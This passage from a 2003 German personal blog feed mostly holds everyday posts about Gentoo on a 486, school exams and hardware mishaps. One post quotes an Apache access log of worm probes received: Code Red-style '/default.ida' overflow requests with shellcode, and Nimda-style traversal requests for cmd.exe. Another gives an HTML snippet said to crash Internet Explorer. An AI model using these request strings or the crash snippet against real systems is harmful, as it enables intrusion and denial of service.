  12337. 212.156.34.148 - - [15/Jun/2003:21:39:49 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 266 "-" "-"<br>212.174.107.18 - - [15/Jun/2003:23:24:03 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 266 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:21 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 271 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:21 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 269 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:21 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:21 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:22 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:22 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:22 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:25 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:29 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:29 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
  12338. <br>212.181.34.130 - - [15/Jun/2003:23:45:29 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
  12339. <br>212.181.34.130 - - [15/Jun/2003:23:45:29 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:30 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 276 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:30 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 276 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:30 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:30 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
  12340. ]]></description>
  12341.    <content:encoded><![CDATA[Da hab ich nun mit nem 486 nen superleisen 'Server' gebastelt und kaum den Apache installiert und alles eingerichtet, schon sieht's im accesslog so aus:<br><br>
  12342. 192.168.23.6 - - [15/Jun/2003:17:58:38 +0200] "GET / HTTP/1.1" 200 71 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4b) Gecko/20030605 Mozilla Firebird/0.6"<br>(Mein erster Zugriff, davon hats natürlich noch n paar mehr *g*)
  12343. <br><br>
  12344. 212.156.34.148 - - [15/Jun/2003:21:39:49 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 266 "-" "-"<br>212.174.107.18 - - [15/Jun/2003:23:24:03 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 266 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:21 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 271 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:21 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 269 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:21 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:21 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:22 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:22 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:22 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:25 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:29 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:29 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
  12345. <br>212.181.34.130 - - [15/Jun/2003:23:45:29 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
  12346. <br>212.181.34.130 - - [15/Jun/2003:23:45:29 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:30 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 276 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:30 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 276 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:30 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"<br>212.181.34.130 - - [15/Jun/2003:23:45:30 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
  12347. ]]></content:encoded>
  12348.  </item>
  12349.  
  12350.  <item>
  12351.    <title>Jaaaaaaaaaaaaa...</title>
  12352.    <link>https://blog.x-way.org/School/2003/06/14/Jaaaaaaaaaaaaa.html</link>
  12353.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323959</guid>
  12354.    <dc:creator>Andreas Jaggi</dc:creator>
  12355.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12356.    <pubDate>Sat, 14 Jun 2003 11:36:00 +0000</pubDate>
  12357.    <category domain="https://blog.x-way.org/School">School</category>
  12358.    <description><![CDATA[Nun habe auch ich die Maturitätsprüfungen erfolgreich überlebt. Und mit mir auch alle anderen!<br>In der Regel fallen 2-3 durch, doch diesmal haben alle bestanden!<br>84 ist halt einfach der beste Jahrgang *g*
  12359. ]]></description>
  12360.    <content:encoded><![CDATA[Nun habe auch ich die Maturitätsprüfungen erfolgreich überlebt. Und mit mir auch alle anderen!<br>In der Regel fallen 2-3 durch, doch diesmal haben alle bestanden!<br>84 ist halt einfach der beste Jahrgang *g*
  12361. ]]></content:encoded>
  12362.  </item>
  12363.  
  12364.  <item>
  12365.    <title>Web Developer extension for Mozilla Firebird</title>
  12366.    <link>https://blog.x-way.org/Webdesign/2003/06/11/Web_Developer_extension_for_Mozilla_Firebird.html</link>
  12367.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323958</guid>
  12368.    <dc:creator>Andreas Jaggi</dc:creator>
  12369.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12370.    <pubDate>Wed, 11 Jun 2003 01:35:00 +0000</pubDate>
  12371.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  12372.    <description><![CDATA[Ist mir gerade bei <a href="http://news.css-technik.de/"><b>CSS-Technik-News</b></a> ins Auge gestochen, dass es jetzt noch weh tut: <a href="https://web.archive.org/web/20030605233954/http://chrispederick.myacen.com/work/firebird/webdeveloper/"><b>Web Developer extension for Mozilla Firebird</b></a>
  12373. ]]></description>
  12374.    <content:encoded><![CDATA[Ist mir gerade bei <a href="http://news.css-technik.de/"><b>CSS-Technik-News</b></a> ins Auge gestochen, dass es jetzt noch weh tut: <a href="https://web.archive.org/web/20030605233954/http://chrispederick.myacen.com/work/firebird/webdeveloper/"><b>Web Developer extension for Mozilla Firebird</b></a>
  12375. ]]></content:encoded>
  12376.  </item>
  12377.  
  12378.  <item>
  12379.    <title>gammel</title>
  12380.    <link>https://blog.x-way.org/Misc/2003/06/06/gammel.html</link>
  12381.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323957</guid>
  12382.    <dc:creator>Andreas Jaggi</dc:creator>
  12383.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12384.    <pubDate>Fri, 06 Jun 2003 00:43:00 +0000</pubDate>
  12385.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12386.    <description><![CDATA[Da's ja <a href="https://web.archive.org/web/20060715140732/http://rw.fuq-u.org/"><b>alle</b></a> <a href="http://kniebes.net/mk/"><b>Welt</b></a> macht, muss ich wohl mitziehen *g*
  12387. <br><a href="https://web.archive.org/web/20030601131549/http://www.southparkstudios.com/games/create.html"><b>Southpark Selfmade</b></a><br>Via Drey, <a href="https://web.archive.org/web/20060715140732/http://rw.fuq-u.org/"><b>rw</b></a> und <a href="http://kniebes.net/mk/"><b>mk</b></a>
  12388. <br><br><img src="https://blog.x-way.org/images/southpark2.png" alt="Gymnasium - Apathie erleben!" title="Gymnasium - Apathie erleben!">
  12389. ]]></description>
  12390.    <content:encoded><![CDATA[Da's ja <a href="https://web.archive.org/web/20060715140732/http://rw.fuq-u.org/"><b>alle</b></a> <a href="http://kniebes.net/mk/"><b>Welt</b></a> macht, muss ich wohl mitziehen *g*
  12391. <br><a href="https://web.archive.org/web/20030601131549/http://www.southparkstudios.com/games/create.html"><b>Southpark Selfmade</b></a><br>Via Drey, <a href="https://web.archive.org/web/20060715140732/http://rw.fuq-u.org/"><b>rw</b></a> und <a href="http://kniebes.net/mk/"><b>mk</b></a>
  12392. <br><br><img src="https://blog.x-way.org/images/southpark2.png" alt="Gymnasium - Apathie erleben!" title="Gymnasium - Apathie erleben!">
  12393. ]]></content:encoded>
  12394.  </item>
  12395.  
  12396.  <item>
  12397.    <title>Happy Birthday x-log</title>
  12398.    <link>https://blog.x-way.org/Misc/2003/06/04/Happy_Birthday_x-log.html</link>
  12399.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323956</guid>
  12400.    <dc:creator>Andreas Jaggi</dc:creator>
  12401.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12402.    <pubDate>Wed, 04 Jun 2003 13:34:00 +0000</pubDate>
  12403.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12404.    <description><![CDATA[Ich habe es natürlich wieder verschlafen:<br>Vorgestern vor einem Jahr hatte ich den ersten (Test)Eintrag, der unterdessen verschwunden ist, ins Weblog geschrieben. Der zweite Eintrag findet man <a href="http://waterwave.ch/weblog/detail.php?id=2"><b>hier</b></a>.<br>Nun habe ich schon ein Jahr lang das Internet mit meinem Gebrabel belästigt und habe nicht vor damit aufzuhören *fg*<br><br>Wer sich beschweren oder gratulieren will, voilà: happybirthday Affenschwanz x-log Punkt waterwave Punkt ch
  12405. <br><br>
  12406. <img src="https://blog.x-way.org/images/torte.gif" alt="Torte">
  12407. ]]></description>
  12408.    <content:encoded><![CDATA[Ich habe es natürlich wieder verschlafen:<br>Vorgestern vor einem Jahr hatte ich den ersten (Test)Eintrag, der unterdessen verschwunden ist, ins Weblog geschrieben. Der zweite Eintrag findet man <a href="http://waterwave.ch/weblog/detail.php?id=2"><b>hier</b></a>.<br>Nun habe ich schon ein Jahr lang das Internet mit meinem Gebrabel belästigt und habe nicht vor damit aufzuhören *fg*<br><br>Wer sich beschweren oder gratulieren will, voilà: happybirthday Affenschwanz x-log Punkt waterwave Punkt ch
  12409. <br><br>
  12410. <img src="https://blog.x-way.org/images/torte.gif" alt="Torte">
  12411. ]]></content:encoded>
  12412.  </item>
  12413.  
  12414.  <item>
  12415.    <title>Fuck</title>
  12416.    <link>https://blog.x-way.org/Tech/2003/05/23/Fuck.html</link>
  12417.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323955</guid>
  12418.    <dc:creator>Andreas Jaggi</dc:creator>
  12419.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12420.    <pubDate>Fri, 23 May 2003 21:41:00 +0000</pubDate>
  12421.    <category domain="https://blog.x-way.org/Tech">Tech</category>
  12422.    <description><![CDATA[Ich hab wieder einmal meinen Computer zu Schrott gemacht.<br>Als ich am CD-Brennen war, ist plötzlich alles eingefroren, nichteinmal ctrl+alt+backspace zum abscheissen von X hat funktioniert. Leider hat aber irgendetwas ununterbrochen auf die Festplatte zugegriffen. Als ich dann eine Stunde später wieder alles gleich vorfand, habe ich versucht mittels Büroklammer und diesem Resetlöchlein am CD-Brenner das Ding abzubrechen; ging in die Hose: irgendwie kam die CD ausm Gleichgewicht und hat im CD-Brenner zwar weiterhin gedreht, aber an allen Enden und Ecken angeschlagen, sprich CD-Brenner demoliert. Das hat natürlich nen riesigen Krach verursacht und so nach 5 Minuten konnt ichs nicht mehr länger ertragen, und auch meine Nachbarn hats wahrscheinlich nicht gerade gefreut (es war ca. Mitternacht). Also hab ich den Resetknopf am Gehäuse gedrückt, so dass die Festplatte immernoch mit Strom versorgt wurde -> vermutlich kein Headcrash.<br>Als das System neu bootete, verlief alles eigentlich normal, nur dass ich nach dem Login / nicht finden konnte also nix mit /sbin/shutdown -h etc. einfach weg. Also noch einmal resetet, und da wird der Kernel geladen, bis er dann mit dieser wunderschönen Fehlermeldung aufhört:<br><br>Kernel panic: VFS: Unable to mount root fs on 03:03<br><br>Und dann hab ich den Rechner abgestellt (am Netzteil) und den Stecker rausgezogen.
  12423. ]]></description>
  12424.    <content:encoded><![CDATA[Ich hab wieder einmal meinen Computer zu Schrott gemacht.<br>Als ich am CD-Brennen war, ist plötzlich alles eingefroren, nichteinmal ctrl+alt+backspace zum abscheissen von X hat funktioniert. Leider hat aber irgendetwas ununterbrochen auf die Festplatte zugegriffen. Als ich dann eine Stunde später wieder alles gleich vorfand, habe ich versucht mittels Büroklammer und diesem Resetlöchlein am CD-Brenner das Ding abzubrechen; ging in die Hose: irgendwie kam die CD ausm Gleichgewicht und hat im CD-Brenner zwar weiterhin gedreht, aber an allen Enden und Ecken angeschlagen, sprich CD-Brenner demoliert. Das hat natürlich nen riesigen Krach verursacht und so nach 5 Minuten konnt ichs nicht mehr länger ertragen, und auch meine Nachbarn hats wahrscheinlich nicht gerade gefreut (es war ca. Mitternacht). Also hab ich den Resetknopf am Gehäuse gedrückt, so dass die Festplatte immernoch mit Strom versorgt wurde -> vermutlich kein Headcrash.<br>Als das System neu bootete, verlief alles eigentlich normal, nur dass ich nach dem Login / nicht finden konnte also nix mit /sbin/shutdown -h etc. einfach weg. Also noch einmal resetet, und da wird der Kernel geladen, bis er dann mit dieser wunderschönen Fehlermeldung aufhört:<br><br>Kernel panic: VFS: Unable to mount root fs on 03:03<br><br>Und dann hab ich den Rechner abgestellt (am Netzteil) und den Stecker rausgezogen.
  12425. ]]></content:encoded>
  12426.  </item>
  12427.  
  12428.  <item>
  12429.    <title>Kein Titel</title>
  12430.    <link>https://blog.x-way.org/Misc/2003/05/21/Kein_Titel.html</link>
  12431.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323954</guid>
  12432.    <dc:creator>Andreas Jaggi</dc:creator>
  12433.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12434.    <pubDate>Wed, 21 May 2003 10:26:00 +0000</pubDate>
  12435.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12436.    <description><![CDATA[Wieder einmal ein <a href="https://blog.x-way.org/images/21052003101358.jpg"><b>Screenshot</b></a>.
  12437. <br><br>
  12438. Chaos A.D.<br>Tanks On The Streets<br>Confronting Police<br>Bleeding The Plebs<br>Raging Crowd<br>Burning Cars<br>Bloodshed Starts<br>Who'll Be Alive?!<br><br>Chaos A.D.<br>Army In Siege<br>Total Alarm<br>I'm Sick Of This<br>Inside The State<br>War Is Created<br>No Man's Land<br>What Is This Shit?!<br><br>Refuse/resist<br>Refuse<br><br>Chaos A.D.<br>Disorder Unleashed<br>Starting To Burn<br>Starting To Lynch<br>Silence Means Death<br>Stand On Your Feet<br>Inner Fear<br>Your Worst Enemy<br><br>Refuse/resist
  12439. ]]></description>
  12440.    <content:encoded><![CDATA[Wieder einmal ein <a href="https://blog.x-way.org/images/21052003101358.jpg"><b>Screenshot</b></a>.
  12441. <br><br>
  12442. Chaos A.D.<br>Tanks On The Streets<br>Confronting Police<br>Bleeding The Plebs<br>Raging Crowd<br>Burning Cars<br>Bloodshed Starts<br>Who'll Be Alive?!<br><br>Chaos A.D.<br>Army In Siege<br>Total Alarm<br>I'm Sick Of This<br>Inside The State<br>War Is Created<br>No Man's Land<br>What Is This Shit?!<br><br>Refuse/resist<br>Refuse<br><br>Chaos A.D.<br>Disorder Unleashed<br>Starting To Burn<br>Starting To Lynch<br>Silence Means Death<br>Stand On Your Feet<br>Inner Fear<br>Your Worst Enemy<br><br>Refuse/resist
  12443. ]]></content:encoded>
  12444.  </item>
  12445.  
  12446.  <item>
  12447.    <title>Menuet OS</title>
  12448.    <link>https://blog.x-way.org/Linux/2003/05/13/Menuet_OS.html</link>
  12449.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323953</guid>
  12450.    <dc:creator>Andreas Jaggi</dc:creator>
  12451.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12452.    <pubDate>Tue, 13 May 2003 18:27:00 +0000</pubDate>
  12453.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  12454.    <description><![CDATA[Gerade beim <a href="http://schockwellenreiter.de/"><b>Schockwellenreiter</b></a> entdeckt und ausprobiert: <a href="http://www.menuetos.org/"><b>Menuet OS</b></a><br><br>Ein 32-Bit-Echtzeit-Betriebssystem mit GUI, komplett in Assembler geschrieben, welches auf einer einzigen Floppy Platz findet!
  12455. ]]></description>
  12456.    <content:encoded><![CDATA[Gerade beim <a href="http://schockwellenreiter.de/"><b>Schockwellenreiter</b></a> entdeckt und ausprobiert: <a href="http://www.menuetos.org/"><b>Menuet OS</b></a><br><br>Ein 32-Bit-Echtzeit-Betriebssystem mit GUI, komplett in Assembler geschrieben, welches auf einer einzigen Floppy Platz findet!
  12457. ]]></content:encoded>
  12458.  </item>
  12459.  
  12460.  <item>
  12461.    <title>f.waterwave.ch</title>
  12462.    <link>https://blog.x-way.org/School/2003/05/05/fwaterwavech.html</link>
  12463.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323952</guid>
  12464.    <dc:creator>Andreas Jaggi</dc:creator>
  12465.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12466.    <pubDate>Mon, 05 May 2003 00:39:00 +0000</pubDate>
  12467.    <category domain="https://blog.x-way.org/School">School</category>
  12468.    <description><![CDATA[<a href="https://web.archive.org/web/20060219141244/http://f.waterwave.ch/"><b>f.waterwave.ch</b></a> ist nun die Website unserer Klasse doch noch etwas geworden.<br>Zuerst schien es ja so, als ob nie mehr etwas geschehen würde, doch in der letzten Schulwoche (von drei Jahren) haben wir es doch noch geschafft ;-)<br><br>Ist 'quick and dirty' programmiert aber noch lange nicht fertig...
  12469. ]]></description>
  12470.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20060219141244/http://f.waterwave.ch/"><b>f.waterwave.ch</b></a> ist nun die Website unserer Klasse doch noch etwas geworden.<br>Zuerst schien es ja so, als ob nie mehr etwas geschehen würde, doch in der letzten Schulwoche (von drei Jahren) haben wir es doch noch geschafft ;-)<br><br>Ist 'quick and dirty' programmiert aber noch lange nicht fertig...
  12471. ]]></content:encoded>
  12472.  </item>
  12473.  
  12474.  <item>
  12475.    <title>Gentoo install.sh</title>
  12476.    <link>https://blog.x-way.org/Linux/2003/04/29/Gentoo_installsh.html</link>
  12477.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323951</guid>
  12478.    <dc:creator>Andreas Jaggi</dc:creator>
  12479.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12480.    <pubDate>Tue, 29 Apr 2003 20:58:00 +0000</pubDate>
  12481.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  12482.    <description><![CDATA[<a href="https://blog.x-way.org/stuff/install.sh"><b>install.sh</b></a> mein kleines Shell-Script um die Installation von Gentoo etwas zu automatisieren *g*<br><br>Der erste Parameter ist der zu kompilierende Kernel (gentoo-sources, gaming-sources, vanilla-sourves oder was auch immer) default ist gentoo-sources. Der zweite Parameter legt fest, wohin gelogt wird, default ist /root/status. Der dritte Parameter legt fest, ob und welche make.conf nach /etc/make.conf kopiert wird.<br>Alle Parameter sind optional, will man jedoch den zweiten Parameter verwenden, so muss der erste auch gesetzt werden, ebenso für den dritten, aber das sollte eigentlich klar sein ;-)<br><br>Und ja, es ist keinsterweise irgendwie schön programmiert, da es nur mal so ein Versuch war, den aber gewisse Leute unbedingt sehen wollen *g*
  12483. ]]></description>
  12484.    <content:encoded><![CDATA[<a href="https://blog.x-way.org/stuff/install.sh"><b>install.sh</b></a> mein kleines Shell-Script um die Installation von Gentoo etwas zu automatisieren *g*<br><br>Der erste Parameter ist der zu kompilierende Kernel (gentoo-sources, gaming-sources, vanilla-sourves oder was auch immer) default ist gentoo-sources. Der zweite Parameter legt fest, wohin gelogt wird, default ist /root/status. Der dritte Parameter legt fest, ob und welche make.conf nach /etc/make.conf kopiert wird.<br>Alle Parameter sind optional, will man jedoch den zweiten Parameter verwenden, so muss der erste auch gesetzt werden, ebenso für den dritten, aber das sollte eigentlich klar sein ;-)<br><br>Und ja, es ist keinsterweise irgendwie schön programmiert, da es nur mal so ein Versuch war, den aber gewisse Leute unbedingt sehen wollen *g*
  12485. ]]></content:encoded>
  12486.  </item>
  12487.  
  12488.  <item>
  12489.    <title>Gentoo auf 486 mit Stage 1</title>
  12490.    <link>https://blog.x-way.org/Linux/2003/04/26/Gentoo_auf_486_mit_Stage_1.html</link>
  12491.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323950</guid>
  12492.    <dc:creator>Andreas Jaggi</dc:creator>
  12493.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12494.    <pubDate>Sat, 26 Apr 2003 11:27:00 +0000</pubDate>
  12495.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  12496.    <description><![CDATA[Da ich ja genügend Zeit habe, den Rechner dauernd laufen zu lassen, habe ich <a href="http://www.gentoo.org/"><b>Gentoo</b></a> auf meinem alten 486er installiert, resp. bin noch dran ;-)<br><br>Und damit ich so weiss wie lange das ganze dauert habe ich ein simples Shell-Script geschrieben, dass mir die Bootstrap, emerge system, emerge sync, emerge -u world und emerge sys-kernel/gentoo-sources ausführt und jeweils die Uhrzeit in eine Datei schreibt. Herausgekommen ist nun folgendes:<br><br>Beginn Bootstrap<br>Wed Apr 23 03:49:00 CEST 2003<br>Beginn emerge system<br>Fri Apr 25 05:46:54 CEST 2003<br>Beginn emerge sync<br>Sat Apr 26 07:59:05 CEST 2003<br>Beginn emerge -u world<br>Sat Apr 26 08:21:35 CEST 2003<br>Beginn emerge sys-kernel/gentoo-sources<br>Sat Apr 26 08:21:35 CEST 2003<br>Finished<br>Sat Apr 26 09:18:42 CEST 2003<br><br>Natürlich dauerte das emerge system "nur" so kurz, weil es ein Minimalsystem ohne graphische Oberfläsche etc. ist, insgesamt 76 Packages!
  12497. ]]></description>
  12498.    <content:encoded><![CDATA[Da ich ja genügend Zeit habe, den Rechner dauernd laufen zu lassen, habe ich <a href="http://www.gentoo.org/"><b>Gentoo</b></a> auf meinem alten 486er installiert, resp. bin noch dran ;-)<br><br>Und damit ich so weiss wie lange das ganze dauert habe ich ein simples Shell-Script geschrieben, dass mir die Bootstrap, emerge system, emerge sync, emerge -u world und emerge sys-kernel/gentoo-sources ausführt und jeweils die Uhrzeit in eine Datei schreibt. Herausgekommen ist nun folgendes:<br><br>Beginn Bootstrap<br>Wed Apr 23 03:49:00 CEST 2003<br>Beginn emerge system<br>Fri Apr 25 05:46:54 CEST 2003<br>Beginn emerge sync<br>Sat Apr 26 07:59:05 CEST 2003<br>Beginn emerge -u world<br>Sat Apr 26 08:21:35 CEST 2003<br>Beginn emerge sys-kernel/gentoo-sources<br>Sat Apr 26 08:21:35 CEST 2003<br>Finished<br>Sat Apr 26 09:18:42 CEST 2003<br><br>Natürlich dauerte das emerge system "nur" so kurz, weil es ein Minimalsystem ohne graphische Oberfläsche etc. ist, insgesamt 76 Packages!
  12499. ]]></content:encoded>
  12500.  </item>
  12501.  
  12502.  <item>
  12503.    <title>IE-Bug</title>
  12504.    <link>https://blog.x-way.org/Misc/2003/04/23/45.html</link>
  12505.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323949</guid>
  12506.    <dc:creator>Andreas Jaggi</dc:creator>
  12507.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12508.    <pubDate>Wed, 23 Apr 2003 02:42:00 +0000</pubDate>
  12509.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12510.    <description><![CDATA[Bei <a href="http://rm.digigeek.net/"><b>rm</b></a> hab ich gerade 'n netten IE-Bug gefunden, der nur mit HTML den IE zum Absturz bringt.<br>Natürlich musste ich das gleich ausprobieren und nun seht selbst, was aufm Computer meiner Eltern (jep, bei mir hat es nur noch Linux!) passiert ist *eg*<br><br><a href="https://blog.x-way.org/images/ie-bug.gif"><b>Screenshot</b></a><br><br><a href="https://web.archive.org/web/20030622132016/http://roman.mainer.de/misc/funstuff/ie_crash_html_only.html"><b>Selber machen</b></a>
  12511. <br><br>
  12512. <pre>
  12513. &lt;html&gt;
  12514. &lt;form&gt;
  12515. &lt;input type crash&gt;
  12516. &lt;/form&gt;
  12517. &lt;/html&gt;
  12518. </pre>
  12519. ]]></description>
